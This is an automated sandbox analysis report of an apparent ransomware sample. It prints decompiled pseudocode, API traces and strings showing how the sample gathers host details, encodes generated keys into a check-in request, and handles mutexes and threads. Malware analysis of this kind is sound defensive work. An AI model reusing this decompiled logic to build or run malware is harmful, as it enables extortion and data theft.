0x0fe64ec1
0x0fe64ec6
0x0fe64ec9
0x0fe64f1a
0x0fe64f1c
0x00000000
0x0fe64f1e
0x0fe64f22
0x0fe64f5f
0x0fe64f61
0x00000000
0x0fe64f63
0x0fe64f6d
0x0fe64f70
0x0fe64f70
0x0fe64f74
0x00000000
0x00000000
0x0fe64f7a
0x0fe64f7a
0x0fe64f7d
0x0fe64f80
0x0fe64f80
0x0fe64f84
0x00000000
0x00000000
0x0fe64f8e
0x0fe64f8e
0x00000000
0x0fe64f8a
0x0fe64f8c
0x00000000
0x00000000
0x0fe64f95
0x0fe64fa4
0x00000000
0x0fe64fa4
0x0fe64f80
0x0fe64f24
0x0fe64f24
0x0fe64f28
0x0fe64f2f
0x0fe64f31
0x0fe64f31
0x0fe64f36
0x0fe64f4f
0x0fe64f52
0x00000000
0x00000000
0x00000000
0x00000000
0x0fe64f38
0x0fe64f38
0x0fe64f38
0x0fe64f3c
0x00000000
0x00000000
0x0fe64f45
0x0fe64f47
0x00000000
0x0fe64f49
0x0fe64f49
0x0fe64f4d
0x00000000
0x00000000
0x00000000
0x00000000
0x0fe64f4d
0x00000000
0x0fe64f47
0x00000000
0x0fe64f38
0x00000000
0x0fe64f54
0x0fe64f54
0x0fe64f57
0x0fe64f58
0x0fe64f59
0x0fe64f5d
0x00000000
0x0fe64f28
0x0fe64f22
0x0fe64ecb
0x0fe64ecb
0x0fe64ecf
0x0fe64f05
0x0fe64f19
0x0fe64ed1
0x0fe64ed3
0x0fe64ed5
0x0fe64ed5
0x0fe64ed9
0x0fe64ef7
0x0fe64efa
0x00000000
0x00000000
0x00000000
0x00000000
0x0fe64edb
0x0fe64ee0
0x0fe64ee0
0x0fe64ee4
0x00000000
0x00000000
0x0fe64eed
0x0fe64eef
0x00000000
0x0fe64ef1
0x0fe64ef1
0x0fe64ef5
0x00000000
0x00000000
0x00000000
0x00000000
0x0fe64ef5
0x00000000
0x0fe64eef
0x00000000
0x0fe64ee0
0x00000000
0x0fe64efc
0x0fe64efc
0x0fe64eff
0x0fe64f00
0x0fe64f01
0x00000000
0x0fe64ed5
0x0fe64ecf
0x00000000

APIs

lstrcpyA.KERNEL32(?,fabian wosar <3,?,0FE651ED), ref: 0FE64F0D
lstrlenA.KERNEL32(00000000,?,0FE651ED), ref: 0FE64F67
lstrcpyA.KERNEL32(?,?,?,0FE651ED), ref: 0FE64F98

Strings

fabian wosar <3, xrefs: 0FE64F05

Memory Dump Source

Source File: 00000002.00000002.370313437.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000002.00000002.370270818.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370323598.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370333139.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370340833.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen
String ID: fabian wosar <3
API String ID: 367037083-1724090804
Opcode ID: f94bd242130ed551a6d0ce0c5202f7bddc44eb2ab636ef8195024eadc430163a
Instruction ID: 11a43c8bd0ad4f85876aca2c227f206dcc8488c95cfe72c2ca3b2d96d761ed11
Opcode Fuzzy Hash: f94bd242130ed551a6d0ce0c5202f7bddc44eb2ab636ef8195024eadc430163a
Instruction Fuzzy Hash: B3315A21C881AD4ACB33CE3858143FABFA2AF435D9F9831F9D8D59B187D7616406C390

Uniqueness

Uniqueness Score: -1.00%

Function 0FE63190 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 42
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FE63190(CHAR* _a4) {
				char _t6;
				CHAR* _t13;
				CHAR* _t16;

				_t13 = _a4;
				_t16 = _t13;
				if( *_t13 == 0) {
					L5:
					lstrcmpiA(_t13, "mask");
					_t10 =  ==  ? 1 : 0;
					lstrcmpiA(_a4, "pub_key");
					 *_t16 = 0x3d;
					_t11 =  ==  ? 2 :  ==  ? 1 : 0;
					_t5 =  ==  ? 2 :  ==  ? 1 : 0;
					return  ==  ? 2 :  ==  ? 1 : 0;
				} else {
					while(1) {
						_t6 =  *_t16;
						if(_t6 == 0x7d) {
							break;
						}
						if(_t6 == 0x3d) {
							 *_t16 = 0;
							goto L5;
						} else {
							_t16 =  &(_t16[1]);
							if( *_t16 != 0) {
								continue;
							} else {
								goto L5;
							}
						}
						goto L8;
					}
					return 0;
				}
				L8:
			}

0x0fe63193
0x0fe63197
0x0fe6319c
0x0fe631b0
0x0fe631b9
0x0fe631ce
0x0fe631d1
0x0fe631d9
0x0fe631e1
0x0fe631e4
0x0fe631e9
0x0fe631a0
0x0fe631a0
0x0fe631a0
0x0fe631a4
0x00000000
0x00000000
0x0fe631a8
0x0fe631ec
0x00000000
0x0fe631aa
0x0fe631aa
0x0fe631ae
0x00000000
0x00000000
0x00000000
0x00000000
0x0fe631ae
0x00000000
0x0fe631a8
0x0fe631f5
0x0fe631f5
0x00000000

APIs

lstrcmpiA.KERNEL32(0FE65444,mask,0FE65445,?,?,0FE63441,0FE65445,00000000,00000000,00000000,?,?,0FE65444,00000000), ref: 0FE631B9
lstrcmpiA.KERNEL32(0FE65444,pub_key,?,0FE63441,0FE65445,00000000,00000000,00000000,?,?,0FE65444,00000000), ref: 0FE631D1

Strings

mask, xrefs: 0FE631B1
pub_key, xrefs: 0FE631BF

Memory Dump Source

Source File: 00000002.00000002.370313437.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000002.00000002.370270818.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370323598.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370333139.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370340833.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID: mask$pub_key
API String ID: 1586166983-1355590148
Opcode ID: e0ec87d878966c9243feaecf38d55011b47d371f66cd9aab4e2b1ae61f3b91ed
Instruction ID: 020a9e7ebc59535b4422ea7e277c8c8dc714b4ed0c14464fcb64da73d2290d21
Opcode Fuzzy Hash: e0ec87d878966c9243feaecf38d55011b47d371f66cd9aab4e2b1ae61f3b91ed
Instruction Fuzzy Hash: FAF0467238828C1EE7154A68AC457E2BBCD9B41394F84207FE68AC2242D2AA98818350

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: ssapst.exePID: 6840, Parent PID: 3528COMMON

Execution Graph

Execution Coverage:	20.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	717
Total number of Limit Nodes:	12

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0FE65860 Relevance: 109.0, APIs: 55, Strings: 7, Instructions: 458
stringmemoryencryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E0FE65860(CHAR* __ecx, int __edx, BYTE* _a4, signed int _a8, long* _a12) {
				char _v148;
				char _v152;
				void* _v156;
				int _v160;
				int _v164;
				CHAR* _v172;
				int _v176;
				CHAR* _v184;
				int _v192;
				void* _v196;
				CHAR* _v200;
				CHAR* _v204;
				WCHAR* _v208;
				void* _v212;
				void* _v216;
				signed int _v220;
				short* _v224;
				void* _v228;
				void* _v232;
				void* _v236;
				CHAR* _v240;
				CHAR* _v268;
				void* __esi;
				CHAR* _t134;
				void* _t136;
				int _t146;
				void* _t149;
				int _t150;
				signed int _t151;
				void* _t153;
				int _t159;
				signed int _t167;
				signed int _t171;
				CHAR* _t178;
				int _t179;
				CHAR* _t182;
				void* _t191;
				long _t195;
				void _t210;
				int _t211;
				intOrPtr _t215;
				int _t216;
				char _t217;
				long _t226;
				int _t239;
				char* _t240;
				void* _t244;
				void* _t245;
				void* _t248;
				long _t250;
				signed int _t254;
				CHAR* _t256;
				int _t259;
				int _t260;
				void* _t261;
				void* _t266;
				CHAR* _t267;
				void* _t270;
				CHAR* _t273;
				long _t276;
				CHAR* _t277;
				char* _t279;
				signed int _t282;
				int _t283;
				long _t286;
				void* _t287;
				void* _t288;
				WCHAR* _t289;
				WCHAR* _t290;
				void* _t291;
				WCHAR* _t292;
				WCHAR* _t294;
				int _t297;
				long _t298;
				void* _t299;
				CHAR* _t300;
				int _t302;
				signed int _t303;
				void* _t307;

				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_v184 = __ecx;
				_v160 = __edx;
				_push(1);
				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_t307 = (_t303 & 0xfffffff8) - 0x9c;
				_push(1);
				_push(__ecx);
				_push(1);
				E0FE63BC0( &_v148);
				E0FE67490( &_v236, __edx); // executed
				_t266 = E0FE672A0( &_v236);
				_t282 = _a8 + __edx;
				_t7 = _t282 + 8; // 0x8
				_t226 = _t266 + _t7 * 8 << 3;
				_t134 = VirtualAlloc(0, _t226, 0x3000, 0x40); // executed
				_t259 = 0;
				_v240 = _t134;
				_v268 = _t134;
				_t239 = 0x30 + (_t266 + _t282 * 4) * 8;
				if(_t134 == 0 || _t239 >= _t226) {
					_v176 = _t259;
					_t267 = _t134;
				} else {
					_t267 = _t239 + _t134;
					_v176 = _t134;
					_v184 = _t267;
					_t259 = _t239;
				}
				_t136 = 2 + _a8 * 8;
				if(_v156 == 0) {
					L7:
					_t240 = 0;
					_v172 = 0;
				} else {
					_t302 = _t259 + _t136;
					if(_t302 >= _t226) {
						goto L7;
					} else {
						_t240 = _t267;
						_v172 = _t267;
						_t267 =  &(_t267[_t136]);
						_t259 = _t302;
						_v184 = _t267;
					}
				}
				_t283 = _v164;
				if(_v156 == 0 || 2 + _t283 * 8 + _t259 >= _t226) {
					_t267 = 0;
					_v184 = 0;
				}
				if(_t240 == 0) {
					L58:
					VirtualFree(_v156, 0, 0x8000);
					E0FE67D70( &_v152);
					return 1;
				} else {
					_t260 = _a8;
					_v160 = _t260 + _t260;
					CryptBinaryToStringA(_a4, _t260, 0x40000001, _t240,  &_v160);
					_v176 = _t283 + _t283;
					CryptBinaryToStringA(_v204, _t283, 0x40000001, _t267,  &_v176);
					_t146 = lstrlenA(_t267);
					_t286 = _t146 + lstrlenA(_v204) + 0x42;
					_t149 = VirtualAlloc(0, _t286, 0x3000, 0x40); // executed
					_v196 = _t149;
					_v200 = _t149;
					_v220 = 0;
					_t150 = lstrlenA(_v204);
					_t261 = _v196;
					_t151 = _t150 + 1;
					if(_t261 == 0 || _t151 >= _t286) {
						_v212 = 0;
					} else {
						_v220 = _t151;
						_v200 = _t261 + _t151;
						_v212 = _t261;
					}
					_t153 = lstrlenA(_t267) + 1;
					if(_v196 == 0 || _t153 + _v220 >= _t286) {
						_v200 = 0;
					}
					_t287 = 0;
					if(lstrlenA(_v204) != 0) {
						_t279 = _v212;
						do {
							_t256 = _v204;
							_t217 =  *((intOrPtr*)(_t287 + _t256));
							if(_t217 != 0xa && _t217 != 0xd) {
								 *_t279 = _t217;
								_t279 = _t279 + 1;
							}
							_t287 = _t287 + 1;
						} while (_t287 < lstrlenA(_t256));
						_t267 = _v216;
					}
					_t288 = 0;
					if(lstrlenA(_t267) != 0) {
						_t254 = _v200;
						_v220 = _t254;
						do {
							_t215 =  *((intOrPtr*)(_t288 + _t267));
							if(_t215 != 0xa && _t215 != 0xd) {
								 *_t254 = _t215;
								_v220 = _t254 + 1;
							}
							_t288 = _t288 + 1;
							_t216 = lstrlenA(_t267);
							_t254 = _v220;
						} while (_t288 < _t216);
					}
					_t289 = _v208;
					lstrcatW(_t289, L"action=call&");
					_t290 =  &(_t289[lstrlenW(_t289)]);
					_v216 = _t290;
					E0FE670A0( &_v184, _t290); // executed
					_v224 = 0;
					_v208 = 0;
					_t159 = E0FE635C0( &_v224,  &_v208); // executed
					if(_t159 == 0) {
						ExitProcess(_t159); // executed
					}
					lstrcatW(_t290, L"&id=");
					_t270 = _v220;
					lstrcatW(_t290, _t270);
					lstrcatW(_t290, L"&subid=");
					_t291 = _v204;
					lstrcatW(_v216, _t291);
					VirtualFree(_t270, 0, 0x8000);
					VirtualFree(_t291, 0, 0x8000);
					_t292 = _v216;
					lstrcatW(_t292, L"&pub_key=");
					_t167 = lstrlenW(_t292);
					MultiByteToWideChar(0xfde9, 0, _v212, 0xffffffff,  &(_t292[_t167]), lstrlenA(_v212));
					_t294 = _v216;
					lstrcatW(_t294, L"&priv_key=");
					_t171 = lstrlenW(_t294);
					_t273 = _v200;
					MultiByteToWideChar(0xfde9, 0, _t273, 0xffffffff,  &(_t294[_t171]), lstrlenA(_t273));
					lstrcatW(_v216, L"&version=2.3.1r");
					_t276 = (lstrlenW(_v208) << 4) + 0x12;
					_v216 = VirtualAlloc(0, _t276, 0x3000, 0x40);
					_t244 = 2 + lstrlenW(_v208) * 8;
					_t178 = _v216;
					if(_t178 == 0 || _t244 >= _t276) {
						_t277 = 0;
					} else {
						_t277 = _t178;
					}
					_t179 = lstrlenW(_v208);
					_t245 =  *0xfe72a78; // 0x0
					_v220 = _t179;
					if(_t245 != 0) {
						VirtualFree(_t245, 0, 0x8000);
					}
					_t182 = VirtualAlloc(0, lstrlenW(L"popkadurak") + 2, 0x3000, 4);
					 *0xfe72a78 = _t182;
					if(_t182 != 0) {
						wsprintfA(_t182, "%S", L"popkadurak");
						_t307 = _t307 + 0xc;
					}
					_t297 = _v220 + _v220;
					E0FE65F00(_v208, _t297, _t297);
					_v192 = _v220 * 8;
					if(CryptBinaryToStringA(_v208, _t297, 0x40000001, _t277,  &_v192) == 0) {
						GetLastError();
					}
					_t104 = lstrlenA(_t277) + 2; // 0x2
					_t298 = _t104;
					_v228 = VirtualAlloc(0, _t298, 0x3000, 0x40);
					_t106 = lstrlenA(_t277) + 1; // 0x1
					_t248 = _t106;
					_t191 = _v228;
					if(_t191 == 0) {
						L46:
						_v216 = 0;
					} else {
						_v216 = _t191;
						if(_t248 >= _t298) {
							goto L46;
						}
					}
					_t299 = 0;
					if(lstrlenA(_t277) != 0) {
						_v236 = _v216;
						do {
							_t210 =  *((intOrPtr*)(_t299 + _t277));
							if(_t210 != 0xa && _t210 != 0xd) {
								 *_t248 = _t210;
								_v236 = _t248 + 1;
							}
							_t299 = _t299 + 1;
							_t211 = lstrlenA(_t277);
							_t248 = _v236;
						} while (_t299 < _t211);
					}
					_t300 = _v216;
					MultiByteToWideChar(0xfde9, 0, _t300, 0xffffffff, _v224, lstrlenA(_t300));
					_v236 = 0;
					_t195 = E0FE654F0(_t300,  &_v236, _t248, 1);
					if(_t195 != 0) {
						_t250 = _v236;
						if(_t250 != 0) {
							 *_a12 = _t250;
						}
						VirtualFree(_v228, 0, 0x8000);
						VirtualFree(_v232, 0, 0x8000);
						VirtualFree(_v212, 0, 0x8000);
						goto L58;
					} else {
						VirtualFree(_v228, _t195, 0x8000);
						VirtualFree(_v232, 0, 0x8000);
						VirtualFree(_v212, 0, 0x8000);
						VirtualFree(_v204, 0, 0x8000);
						E0FE67D70( &_v200);
						return 0;
					}
				}
			}

APIs

Part of subcall function 0FE63BC0: GetProcessHeap.KERNEL32(?,?,0FE64807,00000000,?,00000000,00000000), ref: 0FE63C5C

Part of subcall function 0FE67490: VirtualAlloc.KERNELBASE(00000000,00000202,00003000,00000004), ref: 0FE674B7
Part of subcall function 0FE67490: GetUserNameW.ADVAPI32(00000000,?), ref: 0FE674C8
Part of subcall function 0FE67490: VirtualAlloc.KERNELBASE(00000000,00000020,00003000,00000004), ref: 0FE674E6
Part of subcall function 0FE67490: GetComputerNameW.KERNEL32 ref: 0FE674F0
Part of subcall function 0FE67490: VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 0FE67510
Part of subcall function 0FE67490: wsprintfW.USER32 ref: 0FE67551
Part of subcall function 0FE67490: VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 0FE6756E
Part of subcall function 0FE67490: RegOpenKeyExW.KERNELBASE(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0FE67592
Part of subcall function 0FE67490: RegQueryValueExW.KERNELBASE(00000000,LocaleName,00000000,00000000,0FE64810,?), ref: 0FE675B6
Part of subcall function 0FE67490: RegCloseKey.KERNELBASE(00000000), ref: 0FE675D2

Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE672F2
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE672FD
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE67313
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE6731E
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE67334
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE6733F
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE67355
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(0FE64B36,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE67360
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE67376
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE67381
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE67397
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE673A2
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE673C1
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE673CC

VirtualAlloc.KERNELBASE(00000000,00000008,00003000,00000040,00000001,00000000,00000001,00000001,00000000,00000001), ref: 0FE658D0
CryptBinaryToStringA.CRYPT32(00000000,00000000,40000001,00000000,?), ref: 0FE65980
CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 0FE65999
lstrlenA.KERNEL32(00000000), ref: 0FE659A2
lstrlenA.KERNEL32(?), ref: 0FE659AA
VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 0FE659BB
lstrlenA.KERNEL32(?), ref: 0FE659D5
lstrlenA.KERNEL32(00000000), ref: 0FE659FE
lstrlenA.KERNEL32(?), ref: 0FE65A1E

Strings

&id=, xrefs: 0FE65AD0
&version=2.3.1r, xrefs: 0FE65B7F
&pub_key=, xrefs: 0FE65B1D
action=call&, xrefs: 0FE65A88
popkadurak, xrefs: 0FE65BFE, 0FE65C1A
&priv_key=, xrefs: 0FE65B54
&subid=, xrefs: 0FE65AE4

Memory Dump Source

Source File: 00000004.00000002.383034284.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000004.00000002.383030160.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383041261.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383047915.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383052166.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: lstrlen$AllocVirtual$BinaryCryptNameString$CloseComputerHeapOpenProcessQueryUserValuewsprintf
String ID: &id=$&priv_key=$&pub_key=$&subid=$&version=2.3.1r$action=call&$popkadurak
API String ID: 1618292170-4215222798
Opcode ID: 1e52b67cbe239ccb72c4ac16bd6c7ea42fe33d0f12c21726d20afbad3c8f6f00
Instruction ID: 5f0cb875b26b68df13319d06917fceeaf976afdcb5301ace188e7f23b226c2bd
Opcode Fuzzy Hash: 1e52b67cbe239ccb72c4ac16bd6c7ea42fe33d0f12c21726d20afbad3c8f6f00
Instruction Fuzzy Hash: 7CF10D71648309AFD710CF25CC84B6BBBA9FF89B94F04092DF584A3290DB74E905CB66

Uniqueness

Uniqueness Score: -1.00%

Function 0FE64B20 Relevance: 40.4, APIs: 22, Strings: 1, Instructions: 182
threadsleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			_entry_() {
				void* _v8;
				void* _v12;
				CHAR* _v16;
				int _v20;
				void* _v24;
				int _v28;
				void* _v32;
				int _v36;
				int _v40;
				int _v44;
				int _v48;
				int _v52;
				int _v60;
				char _v80;
				void* _t54;
				void* _t55;
				int _t79;
				void* _t81;
				short* _t97;
				void* _t114;

				Sleep(0x3e8); // executed
				_t54 = E0FE647D0(_t90, _t106); // executed
				if(_t54 == 0) {
					_t55 = CreateThread(0, 0, E0FE62D30, 0, 0, 0); // executed
					_v8 = _t55;
					if(_v8 != 0) {
						if(WaitForSingleObject(_v8, 0x1388) == 0x102) {
							_t90 = _v8;
							TerminateThread(_v8, 0);
						}
						_t106 = _v8;
						CloseHandle(_v8); // executed
					}
					E0FE648C0(); // executed
					E0FE642B0(_t90, _t106); // executed
					E0FE66550( &_v80); // executed
					_v40 = 0;
					_v36 = 0;
					_v28 = 0;
					_v44 = 0;
					E0FE66500( &_v80,  &_v28,  &_v44,  &_v40,  &_v36);
					_v48 = 0;
					_v16 = 0;
					if(E0FE64B00(_v28) == 0) {
						while(_v48 == 0) {
							_t81 = E0FE65860(_v28, _v44, _v40, _v36,  &_v16); // executed
							_t114 = _t114 + 0xc;
							if(_t81 != 0) {
								_v48 = 1;
							} else {
								Sleep(0x2710);
							}
						}
						E0FE664C0( &_v80);
						_v32 = 0;
						_v20 = 0;
						_v52 = 0;
						_v60 = 0;
						__eflags = _v16;
						if(_v16 == 0) {
							L19:
							E0FE64200();
							InitializeCriticalSection(0xfe72a48);
							__eflags = _v52;
							if(__eflags == 0) {
								E0FE63FF0( &_v80);
							} else {
								E0FE641D0(_v32, _v20, __eflags);
							}
							DeleteCriticalSection(0xfe72a48);
							__eflags = E0FE63C70();
							if(__eflags != 0) {
								E0FE645B0(__eflags);
							}
							_v24 = VirtualAlloc(0, 0x200, 0x3000, 4);
							__eflags = _v24;
							if(__eflags != 0) {
								GetModuleFileNameW(0, _v24, 0x100);
								E0FE63DB0(_v24, _v24, __eflags);
								VirtualFree(_v24, 0, 0x8000);
							}
							__eflags =  *0xfe72a44;
							if( *0xfe72a44 != 0) {
								_t97 =  *0xfe72a44; // 0x2a20000
								ShellExecuteW(0, L"open", _t97, 0, 0, 5);
							}
							ExitThread(0);
						}
						_v20 = lstrlenA(_v16);
						_v32 = VirtualAlloc(0, _v20, 0x3000, 4);
						_t79 = CryptStringToBinaryA(_v16, 0, 1, _v32,  &_v20, 0, 0);
						__eflags = _t79;
						if(_t79 != 0) {
							_v52 = 1;
							goto L19;
						}
						ExitProcess(0);
					} else {
						_v12 = VirtualAlloc(0, 0x200, 0x3000, 4);
						_t119 = _v12;
						if(_v12 != 0) {
							GetModuleFileNameW(0, _v12, 0x100);
							E0FE63DB0(_v12,  &_v44, _t119);
							VirtualFree(_v12, 0, 0x8000);
						}
						ExitProcess(0);
					}
				}
				ExitProcess(0);
			}

APIs

Sleep.KERNELBASE(000003E8), ref: 0FE64B2B

Part of subcall function 0FE647D0: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FE6482C
Part of subcall function 0FE647D0: lstrcpyW.KERNEL32 ref: 0FE6484F
Part of subcall function 0FE647D0: lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FE64856
Part of subcall function 0FE647D0: CreateMutexW.KERNELBASE(00000000,00000000,00000000,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FE6486E
Part of subcall function 0FE647D0: GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FE6487A
Part of subcall function 0FE647D0: GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FE64881
Part of subcall function 0FE647D0: VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FE6489B

ExitProcess.KERNEL32 ref: 0FE64B3C
CreateThread.KERNELBASE ref: 0FE64B51
WaitForSingleObject.KERNEL32(00000000,00001388), ref: 0FE64B69
TerminateThread.KERNEL32(00000000,00000000), ref: 0FE64B7C
CloseHandle.KERNEL32(00000000), ref: 0FE64B86
VirtualAlloc.KERNEL32(00000000,00000200,00003000,00000004,00000000,00000000,00000000,00000000), ref: 0FE64BFA
GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 0FE64C14
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FE64C2D
ExitProcess.KERNEL32 ref: 0FE64C35

Strings

open, xrefs: 0FE64D90

Memory Dump Source

Source File: 00000004.00000002.383034284.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000004.00000002.383030160.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383041261.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383047915.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383052166.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: Virtual$AllocCreateErrorExitFreeLastProcessThread$CloseFileHandleModuleMutexNameObjectSingleSleepTerminateWaitlstrcpylstrlen
String ID: open
API String ID: 1803241880-2758837156
Opcode ID: 962630d2b709f7c4cbadeaf70699339b5dd5247ccbb6359a0efd7ec38c5df628
Instruction ID: 1e82e0f1a1db91fcd2cf5aefa72332b720f604fe79738d0ddc0f58708c3adcdf
Opcode Fuzzy Hash: 962630d2b709f7c4cbadeaf70699339b5dd5247ccbb6359a0efd7ec38c5df628
Instruction Fuzzy Hash: A4712170E8030CABEB14DFE1DC59FEE7B75AB05B96F105015E601BA2C1DBB86944CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0FE682B0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 111
encryptionlibrarymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E0FE682B0(intOrPtr __ecx, void* __edx) {
				long* _v8;
				intOrPtr _v12;
				signed int _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v34;
				short _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				long** _t37;
				void* _t40;
				struct HINSTANCE__* _t45;
				_Unknown_base(*)()* _t46;
				signed int _t54;
				long _t55;
				intOrPtr _t56;
				signed int _t58;
				signed int _t60;
				void* _t63;
				void* _t64;
				void* _t65;

				_t54 = 0;
				_v12 = __ecx;
				_t37 =  &_v8;
				_t63 = __edx;
				__imp__CryptAcquireContextW(_t37, 0, 0, 1, 0xf0000000); // executed
				if(_t37 == 0) {
					L15:
					return _t54;
				} else {
					_t58 = 0;
					do {
						_t3 = _t58 + 0x61; // 0x61
						 *((short*)(_t65 + _t58 * 2 - 0x64)) = _t3;
						_t58 = _t58 + 1;
					} while (_t58 < 0x1a);
					_t7 = _t63 + 1; // 0x1
					_t55 = _t7;
					_t40 = VirtualAlloc(0, _t55, 0x3000, 0x40); // executed
					_t64 = _t40;
					if(_t64 == 0 || _t63 >= _t55) {
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t64, 0, 0x8000);
						return 0;
					} else {
						_v48 = 0x70797243;
						_v44 = 0x6e654774;
						_v40 = 0x646e6152;
						_v36 = 0x6d6f;
						_v34 = 0;
						_v32 = 0x61766441;
						_v28 = 0x32336970;
						_v24 = 0x6c6c642e;
						_v20 = 0;
						_t45 = GetModuleHandleA( &_v32);
						if(_t45 != 0) {
							L7:
							_t19 =  &_v48; // 0x70797243
							_t46 = GetProcAddress(_t45, _t19);
							if(_t46 == 0) {
								goto L13;
							} else {
								_push(_t64);
								_push(_t63);
								_push(_v8);
								if( *_t46() == 0) {
									goto L13;
								} else {
									_t60 = 0;
									if(_t63 != 0) {
										_t56 = _v12;
										_v16 = 0x1a;
										do {
											asm("cdq");
											 *((short*)(_t56 + _t60 * 2)) =  *((intOrPtr*)(_t65 + ( *(_t64 + _t60) & 0x000000ff) % _v16 * 2 - 0x64));
											_t60 = _t60 + 1;
										} while (_t60 < _t63);
									}
									_t54 = 1;
								}
							}
						} else {
							_t18 =  &_v32; // 0x61766441
